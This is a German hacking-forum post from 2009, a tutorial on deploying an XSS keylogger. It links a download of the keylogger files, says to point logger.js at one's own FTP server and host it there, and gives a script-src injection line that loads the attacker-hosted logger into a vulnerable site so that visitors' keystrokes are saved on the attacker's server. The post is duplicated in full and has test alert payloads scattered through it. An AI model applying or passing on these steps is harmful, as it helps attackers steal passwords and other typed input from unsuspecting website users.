trisn
09.08.2009, 18:46
XSS Keylogger
written by trisn
So , heute zeige ich euch wie ihr Tastenanschläge bei einer XSS Vulnerability speichert. [Keylogger]
';alert(1)
Zuerst benötigen wir die Entsprechenden Daten
http://www.load.to/WYRuLWPWgc/XSS_Keylogger_Daten.rar
';alert(2)
Nun ändern wir die Daten in der logger.js auf unseren FTP Server
Die Zeilen die zu ändern sind , sind leicht zu finden.
';alert(3)
Nun laden wir den ganzen Krempel hoch , auf einen FTP Server
der JavaCode ausführt , probiert es mal mit funpic oder so könnt klappen.
Packt die Sachen alle in einen Ordner und gebt den /path an den ihr auch in logger.js eingegeben habt.
';alert(4)
Nun brauchen wir noch eine Seite wo wir JavaScript ausführen können,
dies können wir über <iframe src=http://free-hack.com zB testen
da wir bei der Anwendung des Loggers auch mir script src= arbeiten.
';alert(5)
So , nun fügen wir das ganze spektakel mit
<script src=http://deinftp.ws/logger.js</script>
and der XSS Vulnerable aus und wir sehen ein Text Dokument
auf unserem FTP Server wo die Tastenanschläge gespeichert werden.
####################
Danke , dass wars und so einfach ist es ;)
#########
Wenn die Keystrokes noch nicht bestimmt wurden müsst ihr dies noch schnell tun ^^
####################
Next Tutorial ; XSS Router Hijacking oder Datenbank Schwächen ausnutzen
####
Visit acceptthefuture.wordpress.com
(Bald wieder aktiv)
';alert(trisn)
written by trisn
So , heute zeige ich euch wie ihr Tastenanschläge bei einer XSS Vulnerability speichert. [Keylogger]
';alert(1)
Zuerst benötigen wir die Entsprechenden Daten
http://www.load.to/WYRuLWPWgc/XSS_Keylogger_Daten.rar
';alert(2)
Nun ändern wir die Daten in der logger.js auf unseren FTP Server
Die Zeilen die zu ändern sind , sind leicht zu finden.
';alert(3)
Nun laden wir den ganzen Krempel hoch , auf einen FTP Server
der JavaCode ausführt , probiert es mal mit funpic oder so könnt klappen.
Packt die Sachen alle in einen Ordner und gebt den /path an den ihr auch in logger.js eingegeben habt.
';alert(4)
Nun brauchen wir noch eine Seite wo wir JavaScript ausführen können,
dies können wir über <iframe src=http://free-hack.com zB testen
da wir bei der Anwendung des Loggers auch mir script src= arbeiten.
';alert(5)
So , nun fügen wir das ganze spektakel mit
<script src=http://deinftp.ws/logger.js</script>
and der XSS Vulnerable aus und wir sehen ein Text Dokument
auf unserem FTP Server wo die Tastenanschläge gespeichert werden.
####################
Danke , dass wars und so einfach ist es ;)
#########
Wenn die Keystrokes noch nicht bestimmt wurden müsst ihr dies noch schnell tun ^^
####################
Next Tutorial ; XSS Router Hijacking oder Datenbank Schwächen ausnutzen
####
Visit acceptthefuture.wordpress.com
(Bald wieder aktiv)
';alert(trisn)